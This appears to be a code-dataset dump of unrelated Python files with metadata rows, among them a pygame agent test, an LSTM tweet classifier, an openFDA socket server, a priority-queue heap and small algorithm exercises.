## if y > screen_y - BORDER_WIDTH:
## vector_y = min(vector_y, -(y - (screen_y - BORDER_WIDTH)) / BORDER_WIDTH)
## if distance_to((x, y), opponent) < 200:
## theta = angle_to((x, y), opponent) + 0.25 * pi + \
## 0.25 * pi * distance_to((x, y), opponent) / 200
## else:
## theta = atan2(vector_y, vector_x)
##
## return theta #x + scale * vector_x, y + scale * vector_y;
#/*
def main():
    # Ad-hoc visual test: fill the screen with agents that follow the `g`
    # field, restarting with a fresh random scene every 4000 frames, until
    # the pygame window is closed.
    import pygame
    from colors import BLACK, WHITE
    from pygame.locals import QUIT
    from scenario import Scenario
    test = Scenario(3)
    screen = test.display.screen
    while True:
        # 500 agents scattered uniformly over the display.
        agents = [Agent((choice(range(test.display.width)),
                         choice(range(test.display.height))),
                        0,
                        10,
                        None, test.display) for _ in range(500)]
        test.display.clear(BLACK)
        # NOTE(review): these create *locals* that shadow the module-level
        # ball/opponent; the field functions keep reading the module-level
        # values. Confirm whether `global ball, opponent` was intended.
        ball = choice(range(150, 774)), choice(range(150, 518))
        opponent = choice(range(150, 774)), choice(range(150, 518))
        test.draw_field("g", 0)
        #pygame.draw.circle(screen, BLUE, ball, 10)
##        pygame.draw.circle(screen, WHITE, goal, 10)
##        pygame.draw.circle(screen, RED, opponent, 10)
##        for x in range(0, test.display.width, 2 * SCALE):
##            for y in range(0, test.display.height, 2 * SCALE):
##                #print(x, y)
##                angle = f(x, y)
##                x_component, y_component = cos(angle), sin(angle)
##                test.(screen, RED, (x, y),
##                      (x + int(x_component * SCALE * 1.5),
##                       y + int(y_component * SCALE * 1.5)))
##                pygame.draw.aaline(screen, GREEN, (x, y),
##                                   (x + int(x_component * SCALE),
##                                    y + int(y_component * SCALE)))
        for n in range(4000):
            # Exit cleanly when the window is closed.
            for event in pygame.event.get():
                if event.type == QUIT:
                    return
##                else:
##                    print(event.type)
            pygame.draw.circle(screen, WHITE, goal, 10)
            #pygame.draw.circle(screen, RED, opponent, 10)
            # Each agent turns toward the field direction at its location,
            # steps forward and redraws itself.
            for agent in agents:
                agent.rotate_to(g(*agent.loc))
                agent.advance()
                agent.draw(0)
            pygame.display.flip()
if __name__ == '__main__':
##    pass
    # Delegates to the scenario module's entry point instead of local main().
    import scenario
    scenario.main()
    #main()
| true |
def mi_funcion(x):
    """Return the even integers in the half-open range [0, x)."""
    evens = []
    for numero in range(0, x, 2):
        evens.append(numero)
    return evens
lista_1 = mi_funcion(11)  # evens below 11: [0, 2, 4, 6, 8, 10]
a9b5780b5ceb7073ddbe6f32ee5f7590740a8ef3 | Python | BartoszSlesar/Python_Morsles_Exercises | /is_perfect_square/perfect_square.py | UTF-8 | 348 | 2.828125 | 3 | [] | no_license | import cmath
from decimal import *
def check_complex(val):
    """True when the principal complex square root of `val` has integral
    real and imaginary parts (the complex-mode perfect-square test)."""
    root = cmath.sqrt(val)
    real_ok = root.real.is_integer()
    imag_ok = root.imag.is_integer()
    return real_ok and imag_ok
def is_perfect_square(val, *, complex=False):
    """Return True if `val` is a perfect square.

    With complex=True the check is delegated to check_complex (which also
    accepts negative inputs). Otherwise negatives are rejected outright and
    Decimal arithmetic is used to avoid float rounding issues.
    (The keyword name `complex` shadows the builtin, but it is part of the
    public signature and is kept for compatibility.)
    """
    if complex:
        return check_complex(val)
    if val < 0:
        return False
    root = int(Decimal(val).sqrt())
    return Decimal(root ** 2) == Decimal(val)
| true |
b1468fb32de29471fafed8ac44effaf42f27ee7b | Python | artykbayevk/AdvancedAI | /train/train_LSTM_Twitter.py | UTF-8 | 1,922 | 2.75 | 3 | [] | no_license | # In[1]
import numpy as np
import pandas as pd
import pickle as pkl
from keras.models import Model
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence, text
from sklearn.preprocessing import OneHotEncoder
from keras.layers import Dense, Input, Dropout, LSTM, Bidirectional
# In[2]
# --- Data loading & tokenisation -------------------------------------------
# Train and test are concatenated so the tokenizer sees the full vocabulary.
train = pd.read_csv('data/Twitter/train.csv')
test = pd.read_csv('data/Twitter/test.csv')
all_data = train.append(test)
all_data.head()
texts = all_data["text"].tolist()
# Lowercase, split on spaces, and strip digits/punctuation from the tweets.
kerasTok = text.Tokenizer(lower=True,split=' ',filters='[0-9]!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n')
kerasTok.fit_on_texts(texts)
all_phrases = kerasTok.texts_to_sequences(texts)
# Pad/truncate every tweet to 60 tokens, then split back into train/test.
X = sequence.pad_sequences(all_phrases, 60)
X_train = X[:train.shape[0], :]
X_test = X[train.shape[0]:, :]
# --- Model hyper-parameters and targets ------------------------------------
vocab_size = len(kerasTok.word_counts)
embed_size = 200
maxLen = 60
# One-hot encode the binary target for the 2-way softmax output layer.
Y_train = np.array(train.target)
encode = OneHotEncoder(sparse=False)
Y_train_1hot = encode.fit_transform(np.reshape(Y_train, (Y_train.shape[0], 1)))
# --- Model definition -------------------------------------------------------
def lstm(input_shape, vocab_len, embed_size):
    """Build the bidirectional-LSTM classifier: embedding -> 2 stacked
    BiLSTM layers with dropout -> 2-way softmax."""
    sentence_indices = Input(shape=input_shape, dtype='int32')
    embedding_layer = Embedding(vocab_len + 1, embed_size)
    embeddings = embedding_layer(sentence_indices)
    X = Bidirectional(LSTM(units=128, return_sequences=True))(embeddings)
    X = Dropout(rate=0.6)(X)
    X = Bidirectional(LSTM(units=64))(X)
    X = Dropout(rate=0.3)(X)
    X = Dense(units=2, activation='softmax')(X)
    model = Model(inputs=sentence_indices, outputs=X)
    return model
model = lstm((maxLen,), vocab_size, embed_size)
model.summary()
# --- Training and persistence -----------------------------------------------
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
history = model.fit(X_train, Y_train_1hot, batch_size=128, epochs=5)
model.save('train/train_data/LSTM_Twitter.h5')
# Persist the training history alongside the model for later plotting.
with open('train/train_data/LSTM_Twitter_HISTORY.pkl', 'wb') as file_pi:
    pkl.dump(history.history, file_pi)
| true |
3e1238f02b6a9c90d1e0cb0cc16cf0043e320433 | Python | Kittyuzu1207/Leecode | /LCCI/0925M堆盘子.py | UTF-8 | 1,690 | 4.375 | 4 | [] | no_license | #堆盘子。设想有一堆盘子,堆太高可能会倒下来。因此,在现实生活中,盘子堆到一定高度时,我们就会另外堆一堆盘子。
#请实现数据结构SetOfStacks,模拟这种行为。SetOfStacks应该由多个栈组成,并且在前一个栈填满时新建一个栈。
#此外,SetOfStacks.push()和SetOfStacks.pop()应该与普通栈的操作方法相同(也就是说,pop()返回的值,应该跟只有一个栈时的情况一样)。
#进阶:实现一个popAt(int index)方法,根据指定的子栈,执行pop操作。
#当某个栈为空时,应当删除该栈。当栈中没有元素或不存在该栈时,pop,popAt 应返回 -1.
#用二维数组解决
class StackOfPlates:
    """A pile of stacks: each stack holds at most `cap` plates, and a full
    stack makes the next push start a new one. pop()/popAt() return -1 when
    there is nothing to pop, and a stack that becomes empty is discarded."""

    def __init__(self, cap: int):
        self.capacity = cap
        self.stacks = []

    def push(self, val: int) -> None:
        # A capacity of 0 means pushes are silently rejected.
        if self.capacity == 0:
            return
        if self.stacks and len(self.stacks[-1]) < self.capacity:
            self.stacks[-1].append(val)
        else:
            self.stacks.append([val])

    def pop(self) -> int:
        if not (self.stacks and self.stacks[-1]):
            return -1
        top = self.stacks[-1]
        val = top.pop()
        if not top:
            self.stacks.pop()
        return val

    def popAt(self, index: int) -> int:
        if len(self.stacks) < index + 1:
            return -1
        chosen = self.stacks[index]
        val = chosen.pop()
        if not chosen:
            self.stacks.pop(index)
        return val
# Your StackOfPlates object will be instantiated and called as such:
# obj = StackOfPlates(cap)
# obj.push(val)
# param_2 = obj.pop()
# param_3 = obj.popAt(index)
| true |
191f7a686dd6db458a4c02e6c2b63df0c0c81ff0 | Python | avflorea/openfda | /openfda-3/programa-server.py | UTF-8 | 3,821 | 2.890625 | 3 | [] | no_license | import socket
import http.client
import json
# Server configuration: IP and port
IP = "127.0.0.1"
PORT = 8088
# Maximum number of pending client connection requests
MAX_OPEN_REQUESTS = 5
headers = {'User-Agent': 'http-client'}
# Open an HTTPS connection from this process (acting as a client) to openFDA
conn = http.client.HTTPSConnection("api.fda.gov")
# Send a GET request for the drug-label resource, limited to 11 results
conn.request("GET", "/drug/label.json?&limit=11", None, headers)
# Read the response message returned by the remote server
info = conn.getresponse()
# Print the response status line
print(info.status, info.reason)
# Read the response body and decode it into a string
drogas_raw = info.read().decode("utf-8")
# Parse the received JSON document
datos = (json.loads(drogas_raw))
# Handler that serves one client: it reads the request (and then ignores it)
# and always replies with the same HTML page listing the medicine names,
# which the browser renders.
def process_client(clientsocket):
    # Read the client's request from the socket. Whatever the client asks
    # for, it always receives the same response.
    mensaje_solicitud = clientsocket.recv(1024)
    # HTML scaffolding shown in the browser window
    contenido = """
<!doctype html>
<html>
<body style='background-color: lightgreen'>
<h1>Bienvenid@ </h1>
<h2> Medicamentos </h2>
"""
    # Walk the 'results' list (11 entries because of the limit above)
    for elem in datos['results']:
        if elem['openfda']:
            print("El nombre del medicamento es:", elem['openfda']['generic_name'][0])
        else: # If 'openfda' is empty, skip this entry and keep iterating
            print("No se tienen datos del nombre del producto")
            continue
        # Append the medicine name so it also appears in the browser page
        contenido += elem['openfda']['generic_name'][0]
    # Add a final line break and close the HTML document
    contenido += """<br/></body></html>"""
    # Always report success, even when the request is malformed
    linea_inicial = "HTTP/1.1 200 OK\n"
    cabecera = "Content-Type: text/html\n"
    cabecera += "Content-Length: {}\n".format(len(str.encode(contenido)))
    # Assemble the response message: status line + headers + blank line + body
    mensaje_respuesta = str.encode(linea_inicial + cabecera + "\n" + contenido)
    clientsocket.send(mensaje_respuesta)
    clientsocket.close()
# Create the listening socket that will receive all client requests
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # Bind the socket to the server's IP and port
    serversocket.bind((IP, PORT))
    # Allow only the configured number of pending requests; extras are refused
    serversocket.listen(MAX_OPEN_REQUESTS)
    while True:
        # Wait for incoming client connections
        print("Esperando clientes en IP: {}, Puerto: {}".format(IP, PORT))
        (clientsocket, address) = serversocket.accept()
        # When one arrives, report the client's address
        print(" Peticion de cliente recibida. IP: {}".format(address))
        process_client(clientsocket)
# Catch socket errors so an unusable port does not crash with a traceback
except socket.error:
    print("Problemas usando el puerto {}".format(PORT))
    print("Lanzalo en otro puerto (y verifica la IP)")
64c706a212b431281af1c1a81cd04433adf8c340 | Python | AbdurRafay01/OS-Programming | /rough.py | UTF-8 | 631 | 3.078125 | 3 | [] | no_license |
list2 = [2,5, 11 , 15] # target = 6
target = 17
prev_value = dict()
index = 0
for i in range(len(list2)):
num = list2[i]
needval = target - num
if needval in prev_value:
print(prev_value[needval] , i)
prev_value[num] = i
#just checking git from atom
def twoSumHashing(num_arr, pair_sum):
hashTable = {}
for i in range(len(num_arr)):
complement = pair_sum - num_arr[i]
if complement in hashTable:
print(hashTable[complement] , i)
hashTable[num_arr[i]] = i
# Driver Code
num_arr = [4, 5, 1, 8]
pair_sum = 9
# Calling function
twoSumHashing(num_arr, pair_sum)
| true |
8990725cf86a231af03fb774fac4e4ac0d88abfe | Python | ashjambhulkar/objectoriented | /LeetCodePremium/1031.maximum-sum-of-two-non-overlapping-subarrays.py | UTF-8 | 278 | 2.546875 | 3 | [] | no_license | #
# @lc app=leetcode id=1031 lang=python3
#
# [1031] Maximum Sum of Two Non-Overlapping Subarrays
#
# @lc code=start
class Solution:
    def maxSumTwoNoOverlap(self, A, L, M):
        """Maximum sum of two non-overlapping subarrays of lengths L and M.

        The original stub had no statement in its body (a syntax error);
        this implements the standard prefix-sum solution in O(n) time and
        O(n) space.
        Example: maxSumTwoNoOverlap([0, 6, 5, 2, 2, 5, 1, 9, 4], 1, 2) == 20
        """
        # prefix[i] = sum of A[:i]
        prefix = [0]
        for value in A:
            prefix.append(prefix[-1] + value)

        def best(first, second):
            # Best total with a `first`-length block strictly before a
            # `second`-length block.
            answer = 0
            best_first = 0
            for i in range(first + second, len(prefix)):
                # Max sum of a first-length block ending at or before i - second.
                best_first = max(best_first,
                                 prefix[i - second] - prefix[i - second - first])
                answer = max(answer, best_first + prefix[i] - prefix[i - second])
            return answer

        # The L-block may come before or after the M-block.
        return max(best(L, M), best(M, L))
# @lc code=end
| true |
204a0e5720dfc79884d4414647ebabfe64d77156 | Python | vishwesh5/HackerRank_Python | /Numpy_Challenges/mean_var_std.py | UTF-8 | 311 | 3.25 | 3 | [] | no_license | # mean_var_std.py
# Link: https://www.hackerrank.com/challenges/np-mean-var-and-std/problem
import numpy as np
# Read the matrix dimensions "N M" from the first stdin line, then N rows
# of M space-separated integers.
A=[]
for i in range([int(i) for i in (input()).split(' ')][0]):
    A.append([int(i) for i in (input()).split(' ')])
A = np.array(A)
# HackerRank expects: mean along axis 1 (per row), variance along axis 0
# (per column), and the standard deviation of the flattened array.
print(np.mean(A,axis=1))
print(np.var(A,axis=0))
print(np.std(A))
| true |
bee0faabbe3ec0320a9f2d7616937e4fd6acff68 | Python | dzambranob/Proyecto-Discretas | /Generador_de_claves.py | UTF-8 | 1,505 | 4.28125 | 4 | [] | no_license | #Generador de claves
#Función para saber si el número es primo
def es_primo(n):
    """Return True when n is a prime number.

    Fixes two defects of the original: n <= 0 incorrectly returned True
    (the trial-division range was empty), and divisors were tested all the
    way up to n/2 instead of only up to sqrt(n).
    """
    if n < 2:
        return False
    for i in range(2, int(n ** 0.5) + 1):
        if n % i == 0:
            return False
    return True
#Función para hallar M.C.D.
def mcd(a, b):
residuo = 0
while(b > 0):
residuo = b
b = a % b
a = residuo
return a
#Función para encontrar un inverso multiplicativo.
def inv_mul(a, n):
for i in range(n):
if (a*i)%n == 1:
return i
#Recepción de valores y devolución de claves.
lineas = int(input('Ingrese cuántas claves desea generar: '))
print()
for i in range(lineas):
cond = True; p = 1; q = 1; e = 1;
while (cond==True):
p = int(input('Ingrese un número primo: '))
if (es_primo(p)):
cond = False
else:
print("Este no es un número primo.")
while (cond==False):
q = int(input('Ingrese otro número primo: '))
if (es_primo(p)):
cond = True
else:
print("Este no es un número primo.")
n = p*q
phi_n = (p-1)*(q-1)
while (cond==True):
print("Ingrese un valor que sea menor y primo relativo de " +
str(phi_n) + ":")
e = int(input())
if (mcd(e, phi_n) == 1 and e<phi_n):
cond = False
else:
print('Este valor no cumple con las condiciones dadas.')
d = inv_mul(e, phi_n)
print("Su clave pública (e,n) es: (" + str(e) + ", " + str(n) + ")")
print("Su clave privada (d,n) es: (" + str(d) + ", " + str(n) + ")")
print()
| true |
8b8001e2d1c7c3bb2d215a7569337a564e48b363 | Python | Guedelho/snake-ai | /constants.py | UTF-8 | 157 | 2.625 | 3 | [
"MIT"
] | permissive | # Directions
# Movement direction tokens (string constants)
UP = 'UP'
DOWN = 'DOWN'
LEFT = 'LEFT'
RIGHT = 'RIGHT'
# Colors as (R, G, B) tuples, 0-255 per channel
RED = (255, 0, 0)
BLACK = (0, 0, 0)
GREEN = (0, 255, 0)
WHITE = (255, 255, 255)
| true |
a994e1d1b356eab9dd7cabb0af9821fdb0435dc0 | Python | mitchelloliveira/python-pdti | /Aula04_06082020/aula04_exe10.py | UTF-8 | 570 | 4.0625 | 4 | [] | no_license | # Curso de Python - PDTI-SENAC/RN
# Profº Weskley Bezerra
# Mitchell Oliveira
# 06/08/2020
# --------------------------------------------------------------
# Faça um Programa que leia dois vetores com 10 elementos cada. Gere um terceiro vetor de 20 elementos,
# cujos valores deverão ser compostos pelos elementos intercalados dos dois outros vetores.
vetor_1 = ["-"] * 10
vetor_2 = ["x"] * 10
# Third vector: elements of the first two, interleaved pairwise (20 items).
vetor_3 = []
for elem_1, elem_2 in zip(vetor_1, vetor_2):
    vetor_3.append(elem_1)
    vetor_3.append(elem_2)
print(vetor_3)
09a3e61d0b170f31542f74cd2d5e50658028f309 | Python | wizDaia/backendschool2021 | /tests/orders_validator_tests.py | UTF-8 | 4,843 | 2.53125 | 3 | [
"MIT"
] | permissive | import unittest
from datetime import datetime
from unittest.mock import MagicMock
from jsonschema import ValidationError
from parameterized import parameterized
from application.data_validator import DataValidator
from tests.test_utils import read_data
class OrdersValidatorTests(unittest.TestCase):
    """Unit tests for DataValidator.validate_orders (JSON schema checks plus
    the custom uniqueness and delivery-hours parsing logic)."""

    @classmethod
    def setUpClass(cls):
        cls.data_validator = DataValidator()

    def test_correct_orders_should_be_valid(self):
        orders_data = read_data('orders.json')
        self.data_validator.validate_orders(orders_data)

    def assert_exception(self, orders_data: dict, expected_exception_message: str):
        # Helper: validation must raise ValidationError containing the message.
        with self.assertRaises(ValidationError) as context:
            self.data_validator.validate_orders(orders_data)
        self.assertIn(expected_exception_message, str(context.exception.message))

    @parameterized.expand([({}, 'data')])
    def test_orders_should_be_incorrect_when_missing_data_field(self, orders_data: dict, field_name: str):
        self.assert_exception(orders_data, f'\'{field_name}\' is a required property')

    @parameterized.expand([
        [{'data': [{'order_id': 1, 'region': 4, 'delivery_hours': []}]}],
        [{'data': [{'order_id': 1, 'weight': 3, 'delivery_hours': []}]}],
        [{'data': [{'order_id': 1, 'weight': 3, 'region': 4}]}]
    ])
    def test_orders_should_be_incorrect_when_missing_field(self, orders_data: dict):
        self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")

    @parameterized.expand([
        ({'data': None}, 'array'),
        ({'data': ['']}, 'object'),
    ])
    def test_orders_should_be_incorrect_when_wrong_type_of_field(self, orders_data: dict, data_type: str):
        self.assert_exception(orders_data, f'is not of type \'{data_type}\'')

    @parameterized.expand([
        [{'data': [{'order_id': 1, 'weight': None, 'region': 4, 'delivery_hours': []}]}],
        [{'data': [{'order_id': 1, 'weight': 3, 'region': None, 'delivery_hours': []}]}],
        [{'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': None}]}],
        [{'data': [{'order_id': 1, 'weight': 3, 'region': [''], 'delivery_hours': []}]}]
    ])
    def test_orders_should_be_incorrect_when_wrong_type_of_item_field(self, orders_data: dict):
        # Bug fix: this method previously reused the name
        # test_orders_should_be_incorrect_when_wrong_type_of_field, silently
        # shadowing (and disabling) the parameterized test defined above.
        self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")

    def test_orders_data_should_be_correct_with_different_field_order(self):
        orders_data = {'data': [{'delivery_hours': [], 'weight': 3, 'region': 4, 'order_id': 1}]}
        self.data_validator.validate_orders(orders_data)

    @parameterized.expand([
        ({'EXTRA': 0, 'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}, ''),
        ({'data': [{'EXTRA': 0, 'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]},
         "{'orders': [{'id': 1}]}"),
    ])
    def test_orders_should_be_incorrect_when_containing_extra_fields(self, orders_data: dict, field_name: str):
        self.assert_exception(orders_data, field_name)

    @unittest.mock.patch('jsonschema.validate')
    def test_orders_should_be_incorrect_when_order_ids_not_unique(self, _):
        # Schema validation is mocked out so only the uniqueness check runs.
        orders_data = {'data': [{'order_id': 1}, {'order_id': 1}]}
        self.assert_exception(orders_data, 'Orders ids are not unique')

    @unittest.mock.patch('jsonschema.validate')
    def test_correct_delivery_hours_should_be_parsed(self, _):
        orders_data = {
            'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}
        self.data_validator.validate_orders(orders_data)
        # Validation converts "HH:MM-HH:MM" strings into (begin, end) tuples.
        delivery_hours = orders_data['data'][0]['delivery_hours']
        self.assertIsInstance(delivery_hours, list)
        self.assertEqual(len(delivery_hours), 1)
        self.assertIsInstance(delivery_hours[0], tuple)
        begin_time, end_time = delivery_hours[0]
        self.assertEqual(begin_time, datetime.strptime("00:59", "%H:%M"))
        self.assertEqual(end_time, datetime.strptime("23:59", "%H:%M"))

    @parameterized.expand([
        [{'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["09:59-33:33"]}]}],
        [{'data': [{'order_id': 1, 'weight': 3, 'region': 4, 'delivery_hours': ["9:9-22:33"]}]}]
    ])
    def test_orders_should_be_incorrect_when_delivery_hours_in_wrong_format(self, orders_data: dict):
        self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")

    @parameterized.expand([
        [{'data': [{'order_id': 1, 'weight': 0, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}],
        [{'data': [{'order_id': 1, 'weight': 51, 'region': 4, 'delivery_hours': ["00:59-23:59"]}]}]
    ])
    def test_orders_weight_should_have_in_correct_interval(self, orders_data: dict):
        self.assert_exception(orders_data, "{'orders': [{'id': 1}]}")
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| true |
5d58b47f708d132af358b6abfd0b121e506f4cfb | Python | rgrishigajra/Competitive-Problems | /Coding interview course/Two Pointers/Minimum Window Sort (medium).py | UTF-8 | 794 | 3.359375 | 3 | [] | no_license | import math as math
def shortest_window_sort(arr):
    """Return the length of the smallest subarray that must be sorted for
    the whole array to become sorted (0 if already sorted).

    Bug fix: the final expansion loop tested `high < len(arr)` before
    reading arr[high + 1], raising IndexError whenever the window had to
    extend to the last element (e.g. [2, 3, 1]); the bound is now
    len(arr) - 1. Empty input now returns 0 instead of crashing, too.
    """
    low = 0
    print(arr)  # debug output kept to preserve the script's observable behaviour
    # Walk forward over the already-sorted prefix.
    while low < len(arr) - 1 and arr[low + 1] > arr[low]:
        low += 1
    if low == len(arr) - 1:
        return 0
    # Walk backward over the already-sorted suffix.
    high = len(arr) - 1
    while high > 0 and arr[high] > arr[high - 1]:
        high -= 1
    # Min/max of the unsorted middle section.
    mini = math.inf
    maxi = -math.inf
    for idx in range(low, high + 1):
        mini = min(mini, arr[idx])
        maxi = max(maxi, arr[idx])
    # Extend the window over any prefix/suffix elements it would displace.
    while low > 0 and arr[low - 1] > mini:
        low -= 1
    while high < len(arr) - 1 and arr[high + 1] < maxi:
        high += 1
    return high - low + 1
def main():
    # Smoke test: the expected results are 5, 5, 0 and 3 (each preceded by
    # the debug print of the input array).
    print(shortest_window_sort([1, 2, 5, 3, 7, 10, 9, 12]))
    print(shortest_window_sort([1, 3, 2, 0, -1, 7, 10]))
    print(shortest_window_sort([1, 2, 3]))
    print(shortest_window_sort([3, 2, 1]))
main()
| true |
63bc38d850ccfc4c017f4fe41ce8ae081df56989 | Python | mathvfx/Notebooks | /Python/data_structures/stack_and_queue/ADT_PriorityQueue.py | UTF-8 | 5,826 | 3.640625 | 4 | [] | no_license | #!env python3
#
# Alex Lim. 2020. https://mathvfx.github.io
# This Python code is intended as my own learning and programming exercises.
#
# REFERENCES and CREDITS:
# Goodrich et al, DATA STRUCTURES AND ALGORITHMS IN PYTHON (2013), Wiley
from abstract_base.PriorityQueue import PQBase
from ADT_ArrayBinaryTree import ArrayBinaryTree
class Empty(Exception):
    '''Raised when peeking or popping from an empty priority queue.'''
    pass
class PriorityQueue(ArrayBinaryTree, PQBase):
    '''An array-based binary (min) heap implementation of Priority Queue ADT.
    Min-heap order and complete binary heap properties are preserved, so
    repeatedly popping yields items sorted by priority value. (Note:
    iterating the queue directly yields keys in internal *heap* order, not
    sorted order.)
    For production, consider instead Python's 'heapq' module. 'heapq' doesn't
    provide PriorityQueue class. Instead, it provides functions that allow a
    standard Python list to be managed as heap. 'heapq' doesn't separately
    manage associated values. Elements serve as their own key.
    '''
    def __init__(self, kv_list: tuple = None, use_max_heap: bool = False):
        '''Constructor. To initialize, provide kv_list, where kv_list is a list
        of tuple(priority, element).
        By default, we use min-heap order property. Set use_max_heap = True
        to use max-heap order property.
        '''
        super().__init__()
        # Name of the rich-comparison dunder used for all heap comparisons:
        # '__lt__' gives a min-heap, '__gt__' a max-heap.
        self._cmp = "__gt__" if use_max_heap else "__lt__"
        if kv_list:
            self._data = [self._Item(k, v) for k,v in kv_list]
            self._heapify()
    def __contains__(self, elem):
        # Override PQBase ABC
        '''Return True if element is contained in this PQ (linear scan).'''
        return any(x for x in self._data if elem == x.element())
    def __iter__(self):
        # Yields priorities (keys) in internal heap order, not sorted order.
        for item in self._data:
            yield item._key
    def __len__(self):
        # Override PQBase ABC
        return super().__len__()
    def add(self, priority, elem):
        # Override PQBase ABC
        '''Push an element with its priority as Item into priority queue.
        "priority" element may be numerical value or objects that can be
        compared. Smallest priority in PQ is defined as the minimum of the set.
        '''
        super().add(self._Item(priority, elem))
        self._upheap(len(self) - 1) # bubble-up when adding item
    def merge(self, other: PQBase):
        # Override PQBase ABC
        '''Merging other PQ into current PQ.'''
        if not isinstance(other, type(self)):
            raise TypeError(f"{repr(other)} must be of type PriorityQueue")
        self._data += other._data # using Python's List __iadd__
        self._heapify()
    def peek(self) -> PQBase._Item:
        # Override PQBase ABC
        '''Return (but not remove) top-priority Item from PQ. "Top-priority" is
        the Item whose priority compares smallest (min-heap) or largest
        (max-heap). Raises Empty when the queue has no items.
        '''
        if self.is_empty():
            raise Empty("PQ is empty. Cannot peek.")
        return self._data[0] # type is _Item
    def pop(self) -> PQBase._Item:
        # Override PQBase ABC
        '''Remove and return top-priority Item from PQ. "Top-priority" is
        the Item whose priority compares smallest (min-heap) or largest
        (max-heap). Raises Empty when the queue has no items.
        '''
        if self.is_empty():
            raise Empty("PQ is empty. Cannot pop.")
        # Always maintain Complete Binary Tree Property first before fixing
        # Heap Order Property.
        self.swap(0, len(self)-1) # move min root to the end node
        ans = self._data.pop() # using Python's list.pop()
        self._downheap(0) # Bubble-down when removing item
        return ans
    #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # Private utility functions
    def _upheap(self, idx: int):
        '''Bubble a node up the binary heap until Min Heap Order Property is
        satisfied.
        '''
        assert idx >= 0
        parent = self.parent(idx)
        # self._cmp is '<' if min-heap; otherwise, it is '>' for max-heap.
        if idx > 0 and getattr(self._data[idx], self._cmp)(self._data[parent]):
            self.swap(idx, parent)
            self._upheap(parent)
    def _downheap(self, idx: int):
        '''Bubble a node down the binary heap until Min Heap Order Property is
        satisfied.
        '''
        assert idx >= 0
        # Check first if last index is left-child within data length.
        # If it is, we still need to check for right-child in at index and
        # compare smaller value in order to confirm smallest children. Finally,
        # we compare smallest child value to its parent and bubble down via
        # swap if smaller.
        if self.has_left_child(idx):
            left = self.left_child(idx)
            min_child = left
            if self.has_right_child(idx):
                right = self.right_child(idx)
                # self._cmp is '<' if min-heap; otherwise, '>' for max-heap.
                if getattr(self._data[right], self._cmp)(self._data[left]):
                    min_child = right
            if getattr(self._data[min_child], self._cmp)(self._data[idx]):
                self.swap(idx, min_child)
                self._downheap(min_child)
    def _heapify(self):
        '''Bottom-up approach to building binary heap from a given list of
        key-value pairs. O(n) operations, compared to otherwise O(n log n) time
        building from top-down.
        '''
        # If we initialized our list ahead, we can construct bottom-up heap
        # with a single loop calling _downheap, starting with deepest level and
        # ending at root. The loop can start with deepest nonleaf, since
        # there's no effect when _downheap is called at leaf.
        if len(self) > 1:
            start = self.parent(len(self) - 1) # begin from last node
            for idx in range(start, -1, -1):
                self._downheap(idx)
| true |
e68d8821329b22bbf54ae16c3206bddd17ac8c7b | Python | pyboost/poost-containers | /tests/test_turbolist.py | UTF-8 | 2,050 | 3.171875 | 3 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# CONTRIBUTORS (sorted by surname)
# LUO, Pengkui <pengkui.luo@gmail.com>
#
#
# UPDATED ON
# 2013: 04/20, 04/21, 06/11
#
"""
Unit tests
"""
print('Executing %s' % __file__)
import unittest
from containers import TurboList
class Test_TurboList (unittest.TestCase):
    """Unit tests for containers.TurboList (a list subclass that also keeps
    a value -> index mapping in its private ``_indices`` dict).

    NOTE(review): the ``range(4)`` / ``range(3)`` comparisons in the remove
    tests only pass on Python 2, where range() returns a list; on Python 3
    they would need ``list(range(...))``.
    """
    def setUp (self):
        # A mixed-type sequence: ints, a string and an (unhashable-safe) tuple.
        self.sequence = [3, 1, -2, 'abc', tuple()]
        self.turbolist = TurboList(self.sequence)
    def test_islist (self):
        # TurboList must remain a genuine list subclass.
        self.assertIsInstance(self.turbolist, list)
    def test__contains__ (self):
        turbolist = self.turbolist
        self.assertTrue(-2 in turbolist)
        self.assertTrue('abc' in turbolist)
    def test__len__ (self):
        self.assertTrue(len(self.turbolist)==5)
    def test__getitem__ (self):
        # Indexing and slicing must behave exactly like the plain list.
        turbolist = self.turbolist
        self.assertEqual(turbolist[1], 1)
        self.assertListEqual(turbolist[2:4], [-2, 'abc'])
        self.assertListEqual(turbolist[:], self.sequence)
        self.assertListEqual(turbolist, self.sequence)
    def test_index (self):
        turbolist = self.turbolist
        self.assertEqual(turbolist.index(3), 0)
        self.assertEqual(turbolist.index('abc'), 3)
        self.assertEqual(turbolist.index(tuple()), 4)
    def test_append (self):
        turbolist = self.turbolist
        turbolist.append(None)
        self.assertListEqual(turbolist, self.sequence+[None])
        self.assertListEqual(turbolist[:], self.sequence+[None])
    def test_remove_1 (self):
        # After a removal the internal index map must be renumbered 0..n-1.
        turbolist = self.turbolist
        turbolist.remove('abc')
        self.assertListEqual(turbolist, [3, 1, -2, tuple()])
        indices = sorted(turbolist._indices.values())
        self.assertListEqual(indices, range(4))
    def test_remove_2 (self):
        # Two removals (head and tail elements) must keep indices consistent.
        turbolist = self.turbolist
        turbolist.remove(3)
        turbolist.remove(tuple())
        self.assertListEqual(turbolist, [1, -2, 'abc'])
        indices = sorted(turbolist._indices.values())
        self.assertListEqual(indices, range(3))
if __name__ == '__main__':
unittest.main()
| true |
3afa36e597e1f0024ac3b7ee0c8fcefe67c9dd10 | Python | Hagai-Mozes/University-Python | /ex2.py | UTF-8 | 2,935 | 4.0625 | 4 | [] | no_license | """ Exercise #2. Python for Engineers."""
